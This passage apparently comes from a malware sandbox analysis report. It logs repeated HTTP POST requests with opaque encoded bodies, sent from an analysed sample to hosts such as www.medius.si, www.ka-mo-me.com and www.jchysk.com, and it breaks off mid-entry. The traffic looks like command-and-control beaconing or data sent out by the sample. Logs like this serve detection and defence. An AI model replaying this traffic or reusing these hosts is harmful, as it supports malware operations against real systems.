63 48 61 32 71 51 6d 4d 56 33 4f 47 69 65 5a 6e 72 72 72 54 61 78 6b 44 57 63 39 75 2f 74 76 73 62 6f 53 4a 49 32 49 59 53 4c 4c 6f 30 62 69 74 72 75 66 35 76 49 62 6e 35 42 43 4a 57 35 57 44 65 4e 63 37 33 78 57 65 64 78 6f 50 35 57 69 72 54 52 44 69 6b 67 3d Data Ascii: bebLXUw9Hgsd1wGbt1jQ1V/y7bgk9HfnQDtV5XRBmmgOSFMCPZ6N1ZqNQhLzVLnvAcR2ugmMVZ+trxacrK9bscsdSPeKWVqRATgBqA0RTFeNoRrhsc9+/we3Qq+9G56+8Q+117uTs7WlHzHMqgtwBe4oPsHkAJ3S2uvYeogBbNE69paaCeLeKVhx6d9N5v7KNhDwzR8JpfN9K6iax5pl9uL6f0AXglHPtCVtiaJoP203msEEf+BC9/lROQs5Szoqo0EOg50SbK1au87IvI7ygRYnO7iEVNje9V2P5jYfr8SisEdO2w8tGDAMulIuhwr/uGx63L9xsLvgV/SqBaIWJ+33K1xLb3E42mscV3n5Y5WE3hefkkMgbUxyL6uS+jTNFGXztPXfxNwD+Y6RhfyvSL5LqfDksi+IrY3d8X2yiKcHvc9x5e0PA+8LzuZaxovnhh0rAPwvGHLuNJwS2XXV9gUT+U/qKkxR5fIY0cHa2qQmMV3OGieZnrrrTaxkDWc9u/tvsboSJI2IYSLLo0bitruf5vIbn5BCJW5WDeNc73xWedxoP5WirTRDikg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 4a 5a 50 6e 31 34 47 49 72 77 75 4c 35 56 42 56 59 45 64 56 47 56 71 67 64 34 62 2f 47 78 57 57 52 61 2b 4c 75 2f 2f 33 78 6d 49 7a 74 35 6a 75 5a 4c 70 54 76 48 57 72 43 65 54 57 72 55 44 2f 2b 59 79 63 6c 38 79 34 70 70 6a 4d 55 6a 46 57 6c 59 68 61 37 68 6e 32 4d 64 55 44 4d 64 74 6a 47 46 49 52 2f 4d 35 56 66 53 44 70 2b 50 54 6b 36 65 5a 77 55 4c 48 79 70 37 6b 42 4a 78 2b 66 54 45 74 42 68 38 5a 65 34 6e 5a 71 2b 32 32 6b 57 4f 34 59 56 6d 55 36 70 51 39 45 59 4c 74 53 51 5a 36 43 2f 72 43 44 31 2f 32 2b 6b 55 58 32 31 47 50 55 59 39 66 38 45 37 34 62 2b 41 72 53 48 48 38 43 32 45 48 39 78 56 4b 71 33 68 73 6d 62 58 44 38 4e 65 67 75 67 4f 67 54 4d 75 2b 67 52 68 6b 51 51 7a 68 46 6c 48 33 68 55 67 7a 64 2f 37 47 56 59 43 57 47 47 37 4e 33 32 48 6c 45 49 72 2b 36 61 44 35 42 62 35 7a 4a 35 4a 31 69 35 70 41 54 2b 6e 54 51 58 6d 7a 55 33 4b 6d 43 65 6d 4a 76 48 32 4a 5a 5a 68 4f 72 4b 57 46 47 74 44 6a 66 36 59 75 52 52 50 6b 71 75 39 30 70 48 39 78 55 73 68 4c 46 61 78 6f 79 51 59 30 6b 30 4f 35 4d 2f 44 73 79 55 59 57 6d 43 4c 59 6c 59 51 67 52 71 42 34 45 6e 4d 4a 54 2f 6f 51 51 6b 32 36 4d 2f 58 31 69 57 2f 39 34 53 54 4f 55 64 6c 2f 52 64 41 5a 57 64 65 6e 5a 65 7a 35 6b 38 70 38 77 61 73 6d 71 51 44 61 74 63 78 6b 6d 31 35 39 4d 70 39 50 38 56 52 34 6d 42 68 2b 64 44 2b 54 73 48 6c 4e 4a 42 32 55 73 34 62 4c 55 61 77 39 54 67 45 4c 35 59 37 70 4c 6d 5a 50 62 62 33 50 6a 42 61 4f 41 65 50 4e 36 50 42 4f 6e 4b 6e 56 61 69 64 67 73 76 54 70 4a 47 35 57 36 46 6c 32 36 35 62 44 57 7a 64 4e 55 59 66 79 4b 2b 4f 32 49 6c 67 36 6d 4c 57 39 6a 61 34 57 2f 31 2b 50 50 72 46 73 2f 78 6b 51 45 35 65 38 6e 72 4a 38 3d Data Ascii: JZPn14GIrwuL5VBVYEdVGVqgd4b/GxWWRa+Lu//3xmIzt5juZLpTvHWrCeTWrUD/+Yycl8y4ppjMUjFWlYha7hn2MdUDMdtjGFIR/M5VfSDp+PTk6eZwULHyp7kBJx+fTEtBh8Ze4nZq+22kWO4YVmU6pQ9EYLtSQZ6C/rCD1/2+kUX21GPUY9f8E74b+ArSHH8C2EH9xVKq3hsmbXD8NegugOgTMu+gRhkQQzhFlH3hUgzd/7GVYCWGG7N32HlEIr+6aD5Bb5zJ5J1i5pAT+nTQXmzU3KmCemJvH2JZZhOrKWFGtDjf6YuRRPkqu90pH9xUshLFaxoyQY0k0O5M/DsyUYWmCLYlYQgRqB4EnMJT/oQQk26M/X1iW/94STOUdl/RdAZWdenZez5k8p8wasmqQDatcxkm159Mp9P8VR4mBh+dD+TsHlNJB2Us4bLUaw9TgEL5Y7pLmZPbb3PjBaOAePN6PBOnKnVaidgsvTpJG5W6Fl265bDWzdNUYfyK+O2Ilg6mLW9ja4W/1+PPrFs/xkQE5e8nrJ8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 4a 5a 50 6e 31 34 47 49 72 77 75 4c 35 56 42 56 59 45 64 56 47 56 71 67 64 34 62 2f 47 78 57 57 52 61 2b 4c 75 2f 2f 33 78 6d 49 7a 74 35 6a 75 5a 4c 70 54 76 48 57 72 43 65 54 57 72 55 44 2f 2b 59 79 63 6c 38 79 34 70 70 6a 4d 55 6a 46 57 6c 59 68 61 37 68 6e 32 4d 64 55 44 4d 64 74 6a 47 46 49 52 2f 4d 35 56 66 53 44 70 2b 50 54 6b 36 65 5a 77 55 4c 48 79 70 37 6b 42 4a 78 2b 66 54 45 74 42 68 38 5a 65 34 6e 5a 71 2b 32 32 6b 57 4f 34 59 56 6d 55 36 70 51 39 45 59 4c 74 53 51 5a 36 43 2f 72 43 44 31 2f 32 2b 6b 55 58 32 31 47 50 55 59 39 66 38 45 37 34 62 2b 41 72 53 48 48 38 43 32 45 48 39 78 56 4b 71 33 68 73 6d 62 58 44 38 4e 65 67 75 67 4f 67 54 4d 75 2b 67 52 68 6b 51 51 7a 68 46 6c 48 33 68 55 67 7a 64 2f 37 47 56 59 43 57 47 47 37 4e 33 32 48 6c 45 49 72 2b 36 61 44 35 42 62 35 7a 4a 35 4a 31 69 35 70 41 54 2b 6e 54 51 58 6d 7a 55 33 4b 6d 43 65 6d 4a 76 48 32 4a 5a 5a 68 4f 72 4b 57 46 47 74 44 6a 66 36 59 75 52 52 50 6b 71 75 39 30 70 48 39 78 55 73 68 4c 46 61 78 6f 79 51 59 30 6b 30 4f 35 4d 2f 44 73 79 55 59 57 6d 43 4c 59 6c 59 51 67 52 71 42 34 45 6e 4d 4a 54 2f 6f 51 51 6b 32 36 4d 2f 58 31 69 57 2f 39 34 53 54 4f 55 64 6c 2f 52 64 41 5a 57 64 65 6e 5a 65 7a 35 6b 38 70 38 77 61 73 6d 71 51 44 61 74 63 78 6b 6d 31 35 39 4d 70 39 50 38 56 52 34 6d 42 68 2b 64 44 2b 54 73 48 6c 4e 4a 42 32 55 73 34 62 4c 55 61 77 39 54 67 45 4c 35 59 37 70 4c 6d 5a 50 62 62 33 50 6a 42 61 4f 41 65 50 4e 36 50 42 4f 6e 4b 6e 56 61 69 64 67 73 76 54 70 4a 47 35 57 36 46 6c 32 36 35 62 44 57 7a 64 4e 55 59 66 79 4b 2b 4f 32 49 6c 67 36 6d 4c 57 39 6a 61 34 57 2f 31 2b 50 50 72 46 73 2f 78 6b 51 45 35 65 38 6e 72 4a 38 3d Data Ascii: JZPn14GIrwuL5VBVYEdVGVqgd4b/GxWWRa+Lu//3xmIzt5juZLpTvHWrCeTWrUD/+Yycl8y4ppjMUjFWlYha7hn2MdUDMdtjGFIR/M5VfSDp+PTk6eZwULHyp7kBJx+fTEtBh8Ze4nZq+22kWO4YVmU6pQ9EYLtSQZ6C/rCD1/2+kUX21GPUY9f8E74b+ArSHH8C2EH9xVKq3hsmbXD8NegugOgTMu+gRhkQQzhFlH3hUgzd/7GVYCWGG7N32HlEIr+6aD5Bb5zJ5J1i5pAT+nTQXmzU3KmCemJvH2JZZhOrKWFGtDjf6YuRRPkqu90pH9xUshLFaxoyQY0k0O5M/DsyUYWmCLYlYQgRqB4EnMJT/oQQk26M/X1iW/94STOUdl/RdAZWdenZez5k8p8wasmqQDatcxkm159Mp9P8VR4mBh+dD+TsHlNJB2Us4bLUaw9TgEL5Y7pLmZPbb3PjBaOAePN6PBOnKnVaidgsvTpJG5W6Fl265bDWzdNUYfyK+O2Ilg6mLW9ja4W/1+PPrFs/xkQE5e8nrJ8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 4a 63 38 6f 33 6e 66 39 30 41 74 46 2b 33 78 63 35 6a 79 6f 32 38 42 43 5a 6c 49 74 53 30 5a 38 6d 2b 42 4f 37 52 43 79 33 31 41 49 53 73 49 58 6a 63 44 65 6c 2f 63 58 32 42 53 74 57 42 32 77 7a 39 61 31 57 6a 43 4f 41 76 6c 79 78 51 44 63 70 63 43 6e 51 70 52 6b 70 59 59 37 41 44 6e 49 30 4e 6a 66 58 71 57 77 47 75 61 4d 33 36 73 4b 4c 70 75 64 32 46 57 2b 38 72 33 64 70 6e 6a 37 64 76 50 45 78 46 55 74 35 6c 47 69 37 53 48 2b 53 53 4c 2f 49 78 38 4d 63 39 35 4f 35 36 63 79 53 6d 75 42 41 44 77 55 65 51 71 54 64 41 4d 71 63 6a 76 78 2f 38 63 39 72 63 57 44 7a 38 79 54 64 54 47 77 6c 45 4f 32 36 63 6f 61 41 5a 67 68 72 64 38 35 36 38 6e 4f 4e 43 5a 56 31 67 73 30 43 6c 42 6a 33 39 41 57 6d 42 51 51 7a 6c 6a 67 73 78 6f 72 4e 44 79 4f 44 41 34 58 36 50 33 6b 68 78 50 6d 41 30 73 4c 51 7a 61 4e 4f 6f 38 72 4b 51 52 56 32 71 65 46 36 69 75 70 7a 54 37 56 4b 34 50 58 51 76 51 56 52 62 35 4d 69 76 54 72 2b 76 49 65 52 61 7a 52 4d 46 58 59 58 71 55 4c 58 6f 6d 46 38 55 51 70 63 6d 53 76 31 69 76 58 4e 35 76 75 32 38 62 58 39 4c 32 53 50 44 33 5a 4f 37 47 53 4f 46 36 6e 54 55 39 4c 2b 77 54 65 67 56 33 4c 55 49 43 7a 42 70 6c 78 37 67 46 76 49 54 42 7a 54 36 38 71 39 4d 35 4e 6a 34 5a 4e 4a 2f 51 7a 45 36 38 2b 72 6c 49 4e 31 4f 71 63 55 70 73 54 30 4e 44 44 37 73 48 51 46 56 74 69 79 4c 33 69 52 48 36 48 6c 6c 32 35 56 4d 50 57 48 73 39 46 30 67 47 6d 46 71 2b 70 2b 77 77 4a 62 6e 6e 4b 48 56 66 2f 2b 66 4a 72 6f 77 73 56 44 6c 4e 48 38 69 63 75 4e 2f 76 49 49 76 5a 35 65 62 6e 39 4e 6d 30 73 4e 4f 78 32 69 2b 32 37 57 59 37 2f 4d 58 6a 35 37 45 35 6b 4e 6a 6c 59 54 6e 64 52 68 78 4f 4b 59 74 4e 62 69 51 66 48 33 34 62 34 6e 64 59 3d Data Ascii: Jc8o3nf90AtF+3xc5jyo28BCZlItS0Z8m+BO7RCy31AISsIXjcDel/cX2BStWB2wz9a1WjCOAvlyxQDcpcCnQpRkpYY7ADnI0NjfXqWwGuaM36sKLpud2FW+8r3dpnj7dvPExFUt5lGi7SH+SSL/Ix8Mc95O56cySmuBADwUeQqTdAMqcjvx/8c9rcWDz8yTdTGwlEO26coaAZghrd8568nONCZV1gs0ClBj39AWmBQQzljgsxorNDyODA4X6P3khxPmA0sLQzaNOo8rKQRV2qeF6iupzT7VK4PXQvQVRb5MivTr+vIeRazRMFXYXqULXomF8UQpcmSv1ivXN5vu28bX9L2SPD3ZO7GSOF6nTU9L+wTegV3LUICzBplx7gFvITBzT68q9M5Nj4ZNJ/QzE68+rlIN1OqcUpsT0NDD7sHQFVtiyL3iRH6Hll25VMPWHs9F0gGmFq+p+wwJbnnKHVf/+fJrowsVDlNH8icuN/vIIvZ5ebn9Nm0sNOx2i+27WY7/MXj57E5kNjlYTndRhxOKYtNbiQfH34b4ndY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 4a 63 38 6f 33 6e 66 39 30 41 74 46 2b 33 78 63 35 6a 79 6f 32 38 42 43 5a 6c 49 74 53 30 5a 38 6d 2b 42 4f 37 52 43 79 33 31 41 49 53 73 49 58 6a 63 44 65 6c 2f 63 58 32 42 53 74 57 42 32 77 7a 39 61 31 57 6a 43 4f 41 76 6c 79 78 51 44 63 70 63 43 6e 51 70 52 6b 70 59 59 37 41 44 6e 49 30 4e 6a 66 58 71 57 77 47 75 61 4d 33 36 73 4b 4c 70 75 64 32 46 57 2b 38 72 33 64 70 6e 6a 37 64 76 50 45 78 46 55 74 35 6c 47 69 37 53 48 2b 53 53 4c 2f 49 78 38 4d 63 39 35 4f 35 36 63 79 53 6d 75 42 41 44 77 55 65 51 71 54 64 41 4d 71 63 6a 76 78 2f 38 63 39 72 63 57 44 7a 38 79 54 64 54 47 77 6c 45 4f 32 36 63 6f 61 41 5a 67 68 72 64 38 35 36 38 6e 4f 4e 43 5a 56 31 67 73 30 43 6c 42 6a 33 39 41 57 6d 42 51 51 7a 6c 6a 67 73 78 6f 72 4e 44 79 4f 44 41 34 58 36 50 33 6b 68 78 50 6d 41 30 73 4c 51 7a 61 4e 4f 6f 38 72 4b 51 52 56 32 71 65 46 36 69 75 70 7a 54 37 56 4b 34 50 58 51 76 51 56 52 62 35 4d 69 76 54 72 2b 76 49 65 52 61 7a 52 4d 46 58 59 58 71 55 4c 58 6f 6d 46 38 55 51 70 63 6d 53 76 31 69 76 58 4e 35 76 75 32 38 62 58 39 4c 32 53 50 44 33 5a 4f 37 47 53 4f 46 36 6e 54 55 39 4c 2b 77 54 65 67 56 33 4c 55 49 43 7a 42 70 6c 78 37 67 46 76 49 54 42 7a 54 36 38 71 39 4d 35 4e 6a 34 5a 4e 4a 2f 51 7a 45 36 38 2b 72 6c 49 4e 31 4f 71 63 55 70 73 54 30 4e 44 44 37 73 48 51 46 56 74 69 79 4c 33 69 52 48 36 48 6c 6c 32 35 56 4d 50 57 48 73 39 46 30 67 47 6d 46 71 2b 70 2b 77 77 4a 62 6e 6e 4b 48 56 66 2f 2b 66 4a 72 6f 77 73 56 44 6c 4e 48 38 69 63 75 4e 2f 76 49 49 76 5a 35 65 62 6e 39 4e 6d 30 73 4e 4f 78 32 69 2b 32 37 57 59 37 2f 4d 58 6a 35 37 45 35 6b 4e 6a 6c 59 54 6e 64 52 68 78 4f 4b 59 74 4e 62 69 51 66 48 33 34 62 34 6e 64 59 3d Data Ascii: Jc8o3nf90AtF+3xc5jyo28BCZlItS0Z8m+BO7RCy31AISsIXjcDel/cX2BStWB2wz9a1WjCOAvlyxQDcpcCnQpRkpYY7ADnI0NjfXqWwGuaM36sKLpud2FW+8r3dpnj7dvPExFUt5lGi7SH+SSL/Ix8Mc95O56cySmuBADwUeQqTdAMqcjvx/8c9rcWDz8yTdTGwlEO26coaAZghrd8568nONCZV1gs0ClBj39AWmBQQzljgsxorNDyODA4X6P3khxPmA0sLQzaNOo8rKQRV2qeF6iupzT7VK4PXQvQVRb5MivTr+vIeRazRMFXYXqULXomF8UQpcmSv1ivXN5vu28bX9L2SPD3ZO7GSOF6nTU9L+wTegV3LUICzBplx7gFvITBzT68q9M5Nj4ZNJ/QzE68+rlIN1OqcUpsT0NDD7sHQFVtiyL3iRH6Hll25VMPWHs9F0gGmFq+p+wwJbnnKHVf/+fJrowsVDlNH8icuN/vIIvZ5ebn9Nm0sNOx2i+27WY7/MXj57E5kNjlYTndRhxOKYtNbiQfH34b4ndY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 65 65 78 48 78 6c 38 59 41 67 78 39 58 6e 66 47 76 67 71 48 44 2b 68 68 50 4e 4d 31 74 41 2f 49 41 33 34 4e 4f 44 4c 69 74 73 2f 31 52 6e 58 44 6e 41 57 73 4e 51 43 49 76 61 55 33 63 79 57 2b 67 6f 2f 4a 61 33 52 63 38 6c 38 76 6e 69 64 4d 35 77 58 54 66 4a 53 30 4f 44 67 48 31 76 66 78 45 73 61 70 47 4e 77 69 32 4c 42 65 31 45 2f 53 46 52 59 49 4f 33 4f 42 39 53 53 69 4b 76 63 61 63 33 5a 2b 52 55 38 44 4f 64 7a 49 69 33 4f 4f 4c 6c 72 56 30 73 69 46 6a 54 35 32 73 61 66 44 47 7a 37 56 52 30 36 4f 5a 73 72 32 4a 53 61 33 67 70 44 68 58 41 5a 78 77 67 42 43 64 48 43 64 74 75 50 72 74 75 6f 37 4a 67 69 34 37 6e 74 51 62 52 6e 46 54 5a 34 46 6d 49 6d 63 79 68 4b 76 32 61 45 31 58 6f 58 59 38 30 39 35 47 34 6f 52 57 42 61 6c 67 67 64 62 48 70 64 38 41 56 4d 38 49 4c 44 41 6f 76 69 38 39 64 4d 71 46 78 4c 67 32 56 39 6a 52 4c 47 77 43 53 75 4c 78 4f 34 4f 30 35 68 36 36 55 64 72 45 57 71 55 66 64 68 55 59 36 47 69 6d 77 63 70 73 35 39 45 6c 61 70 5a 57 33 39 6e 4d 47 67 4f 44 2b 34 71 56 50 7a 36 6a 4c 58 42 61 4f 63 48 38 78 67 6b 50 4c 70 6c 63 4d 58 62 41 43 42 73 4f 61 63 77 4a 2f 46 79 73 38 31 39 6d 57 41 54 46 55 4c 64 47 35 77 76 46 55 34 52 64 52 64 74 55 2f 38 4f 53 68 55 49 2b 34 64 34 56 4f 43 56 44 41 79 46 75 30 32 33 37 52 6d 68 53 72 38 62 73 38 6d 68 51 42 42 50 75 72 33 31 65 69 77 54 6c 41 76 78 68 38 65 76 4b 53 62 67 44 70 74 70 52 55 59 63 4f 78 6a 55 66 70 43 74 4e 38 72 4c 30 72 75 2b 54 37 31 46 54 72 77 62 6f 42 67 6e 59 30 32 72 72 2f 38 74 4c 4a 78 69 37 34 46 68 75 6d 7a 72 74 6e 53 62 35 58 45 55 6e 55 31 57 43 51 4f 30 4c 33 6e 41 45 43 69 4d 5a 68 4f 6b 73 43 58 6c 55 47 51 66 53 78 6e 55 65 38 4e 4c 50 74 35 4e 6f 64 57 51 71 6f 66 75 48 50 55 5a 49 38 78 6a 6b 58 38 76 30 6c 66 6d 7a 38 58 6a 7a 6e 2f 72 54 48 47 53 52 41 36 7a 35 6a 75 57 Data Ascii: eexHxl8YAgx9XnfGvgqHD+hhPNM1tA/IA34NODLits/1RnXDnAWsNQCIvaU3cyW+go/Ja3Rc8l8vnidM5wXTfJS0ODgH1vfxEsapGNwi2LBe1E/SFRYIO3OB9SSiKvcac3Z+RU8DOdzIi3OOLlrV0siFjT52safDGz7VR06OZsr2JSa3gpDhXAZxwgBCdHCdtuPrtuo7Jgi47ntQbRnFTZ4FmImcyhKv2aE1XoXY8095G4oRWBalggdbHpd8AVM8ILDAovi89dMqFxLg2V9jRLGwCSuLxO4O05h66UdrEWqUfdhUY6Gimwcps59ElapZW39nMGgOD+4qVPz6jLXBaOcH8xgkPLplcMXbACBsOacwJ/Fys819mWATFULdG5wvFU4RdRdtU/8OShUI+4d4VOCVDAyFu0237RmhSr8bs8mhQBBPur31eiwTlAvxh8evKSbgDptpRUYcOxjUfpCtN8rL0ru+T71FTrwboBgnY02rr/8tLJxi74FhumzrtnSb5XEUnU1WCQO0L3nAECiMZhOksCXlUGQfSxnUe8NLPt5NodWQqofuHPUZI8xjkX8v0lfmz8Xjzn/rTHGSRA6z5juW
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 55 51 75 64 4b 63 36 44 50 77 77 37 36 79 2b 39 57 62 68 4b 43 54 45 32 72 49 66 4f 30 61 6a 56 34 6e 67 2f 64 52 78 50 33 65 59 71 61 65 42 30 62 6f 4c 50 45 56 69 56 2f 4a 33 59 69 55 6e 31 78 45 33 6b 61 5a 68 6b 52 61 49 30 79 50 33 4e 4b 6b 32 69 2b 43 67 58 39 34 58 48 41 6a 32 4e 78 7a 6f 34 64 64 68 6f 6a 6b 32 45 43 54 43 50 41 6e 75 32 70 6f 55 51 49 66 44 7a 79 4e 78 30 53 31 58 55 5a 48 45 77 37 74 2f 66 61 64 71 4e 33 63 79 58 4d 72 56 2b 30 32 6f 56 6a 46 6f 51 6e 64 4b 64 62 47 6a 4e 67 66 67 35 69 70 38 73 2f 58 59 62 4e 44 41 39 7a 46 64 43 61 4e 44 4e 37 78 68 6d 4c 65 61 49 75 66 73 44 30 4b 33 4e 78 56 72 70 41 51 7a 4a 79 6c 2b 61 6e 42 52 30 6c 64 76 61 58 69 37 56 6b 6a 47 68 4b 74 66 70 6e 30 68 31 71 37 44 43 51 4a 32 74 4d 75 35 63 72 34 79 65 54 62 43 46 64 57 74 32 38 4a 33 36 37 45 54 75 58 6f 51 50 6e 48 6c 34 73 6a 41 55 57 71 4c 30 31 57 34 6a 73 65 54 54 74 39 67 65 75 48 51 79 45 4e 57 67 33 58 56 4e 31 74 53 37 2b 50 66 50 71 66 68 39 6b 6b 74 70 36 57 62 76 4e 33 53 73 4d 39 55 51 6f 78 4e 63 62 31 50 6d 50 4a 4b 77 61 63 55 65 76 77 6d 30 6e 4c 5a 38 70 44 47 76 49 37 6f 63 6d 52 31 52 4d 6b 76 78 55 46 62 59 4b 67 2b 45 5a 61 55 73 48 74 35 43 78 41 54 72 2b 72 71 75 68 2b 31 41 33 50 30 43 5a 55 63 46 77 49 46 64 76 4d 39 66 43 7a 74 59 4c 77 62 55 32 32 39 73 4a 48 44 65 59 79 2b 66 6f 62 6a 52 56 4d 42 6e 73 64 35 71 6d 73 38 6b 62 4e 68 4d 41 66 65 54 74 55 48 74 72 75 49 58 34 31 59 43 30 75 54 4d 4c 49 47 6b 55 59 6c 37 4d 78 2b 54 4a 6d 65 6b 7a 6f 37 58 6a 4b 75 62 55 7a 44 37 4a 2f 43 73 47 7a 58 37 67 69 6f 61 6c 38 32 49 67 6b 63 67 54 2f 33 70 4d 4f 31 52 33 6e 76 35 4c 51 2b 6a 54 44 41 79 73 2b 4b 4c 47 68 37 56 53 4a 6b 4a 75 34 47 76 37 68 50 7a 45 2b 52 42 61 6d 54 2b 44 41 3d 3d Data Ascii: UQudKc6DPww76y+9WbhKCTE2rIfO0ajV4ng/dRxP3eYqaeB0boLPEViV/J3YiUn1xE3kaZhkRaI0yP3NKk2i+CgX94XHAj2Nxzo4ddhojk2ECTCPAnu2poUQIfDzyNx0S1XUZHEw7t/fadqN3cyXMrV+02oVjFoQndKdbGjNgfg5ip8s/XYbNDA9zFdCaNDN7xhmLeaIufsD0K3NxVrpAQzJyl+anBR0ldvaXi7VkjGhKtfpn0h1q7DCQJ2tMu5cr4yeTbCFdWt28J367ETuXoQPnHl4sjAUWqL01W4jseTTt9geuHQyENWg3XVN1tS7+PfPqfh9kktp6WbvN3SsM9UQoxNcb1PmPJKwacUevwm0nLZ8pDGvI7ocmR1RMkvxUFbYKg+EZaUsHt5CxATr+rquh+1A3P0CZUcFwIFdvM9fCztYLwbU229sJHDeYy+fobjRVMBnsd5qms8kbNhMAfeTtUHtruIX41YC0uTMLIGkUYl7Mx+TJmekzo7XjKubUzD7J/CsGzX7gioal82IgkcgT/3pMO1R3nv5LQ+jTDAys+KLGh7VSJkJu4Gv7hPzE+RBamT+DA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 55 51 75 64 4b 63 36 44 50 77 77 37 36 79 2b 39 57 62 68 4b 43 54 45 32 72 49 66 4f 30 61 6a 56 34 6e 67 2f 64 52 78 50 33 65 59 71 61 65 42 30 62 6f 4c 50 45 56 69 56 2f 4a 33 59 69 55 6e 31 78 45 33 6b 61 5a 68 6b 52 61 49 30 79 50 33 4e 4b 6b 32 69 2b 43 67 58 39 34 58 48 41 6a 32 4e 78 7a 6f 34 64 64 68 6f 6a 6b 32 45 43 54 43 50 41 6e 75 32 70 6f 55 51 49 66 44 7a 79 4e 78 30 53 31 58 55 5a 48 45 77 37 74 2f 66 61 64 71 4e 33 63 79 58 4d 72 56 2b 30 32 6f 56 6a 46 6f 51 6e 64 4b 64 62 47 6a 4e 67 66 67 35 69 70 38 73 2f 58 59 62 4e 44 41 39 7a 46 64 43 61 4e 44 4e 37 78 68 6d 4c 65 61 49 75 66 73 44 30 4b 33 4e 78 56 72 70 41 51 7a 4a 79 6c 2b 61 6e 42 52 30 6c 64 76 61 58 69 37 56 6b 6a 47 68 4b 74 66 70 6e 30 68 31 71 37 44 43 51 4a 32 74 4d 75 35 63 72 34 79 65 54 62 43 46 64 57 74 32 38 4a 33 36 37 45 54 75 58 6f 51 50 6e 48 6c 34 73 6a 41 55 57 71 4c 30 31 57 34 6a 73 65 54 54 74 39 67 65 75 48 51 79 45 4e 57 67 33 58 56 4e 31 74 53 37 2b 50 66 50 71 66 68 39 6b 6b 74 70 36 57 62 76 4e 33 53 73 4d 39 55 51 6f 78 4e 63 62 31 50 6d 50 4a 4b 77 61 63 55 65 76 77 6d 30 6e 4c 5a 38 70 44 47 76 49 37 6f 63 6d 52 31 52 4d 6b 76 78 55 46 62 59 4b 67 2b 45 5a 61 55 73 48 74 35 43 78 41 54 72 2b 72 71 75 68 2b 31 41 33 50 30 43 5a 55 63 46 77 49 46 64 76 4d 39 66 43 7a 74 59 4c 77 62 55 32 32 39 73 4a 48 44 65 59 79 2b 66 6f 62 6a 52 56 4d 42 6e 73 64 35 71 6d 73 38 6b 62 4e 68 4d 41 66 65 54 74 55 48 74 72 75 49 58 34 31 59 43 30 75 54 4d 4c 49 47 6b 55 59 6c 37 4d 78 2b 54 4a 6d 65 6b 7a 6f 37 58 6a 4b 75 62 55 7a 44 37 4a 2f 43 73 47 7a 58 37 67 69 6f 61 6c 38 32 49 67 6b 63 67 54 2f 33 70 4d 4f 31 52 33 6e 76 35 4c 51 2b 6a 54 44 41 79 73 2b 4b 4c 47 68 37 56 53 4a 6b 4a 75 34 47 76 37 68 50 7a 45 2b 52 42 61 6d 54 2b 44 41 3d 3d Data Ascii: UQudKc6DPww76y+9WbhKCTE2rIfO0ajV4ng/dRxP3eYqaeB0boLPEViV/J3YiUn1xE3kaZhkRaI0yP3NKk2i+CgX94XHAj2Nxzo4ddhojk2ECTCPAnu2poUQIfDzyNx0S1XUZHEw7t/fadqN3cyXMrV+02oVjFoQndKdbGjNgfg5ip8s/XYbNDA9zFdCaNDN7xhmLeaIufsD0K3NxVrpAQzJyl+anBR0ldvaXi7VkjGhKtfpn0h1q7DCQJ2tMu5cr4yeTbCFdWt28J367ETuXoQPnHl4sjAUWqL01W4jseTTt9geuHQyENWg3XVN1tS7+PfPqfh9kktp6WbvN3SsM9UQoxNcb1PmPJKwacUevwm0nLZ8pDGvI7ocmR1RMkvxUFbYKg+EZaUsHt5CxATr+rquh+1A3P0CZUcFwIFdvM9fCztYLwbU229sJHDeYy+fobjRVMBnsd5qms8kbNhMAfeTtUHtruIX41YC0uTMLIGkUYl7Mx+TJmekzo7XjKubUzD7J/CsGzX7gioal82IgkcgT/3pMO1R3nv5LQ+jTDAys+KLGh7VSJkJu4Gv7hPzE+RBamT+DA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 6a 72 64 58 66 63 58 2b 70 51 79 6a 36 76 65 77 37 47 47 63 35 54 34 6e 6a 4c 61 54 6d 59 72 37 79 63 66 2f 39 53 73 76 57 72 39 4c 76 4f 34 2b 42 37 63 32 58 6c 6f 33 48 54 38 61 41 6b 4a 78 45 6c 68 57 79 4f 43 4c 2b 45 59 79 70 65 61 6b 4c 55 37 32 79 6d 45 78 73 58 31 52 39 6b 49 69 62 6a 4c 48 48 6d 71 37 63 53 41 55 45 5a 53 50 71 44 4d 6e 6e 68 43 4f 46 63 30 30 37 4f 62 70 50 74 51 33 65 30 73 67 33 56 50 4f 70 4a 45 38 66 75 73 38 79 48 6a 57 6c 6a 57 61 77 32 46 5a 37 30 6d 56 79 78 72 33 43 59 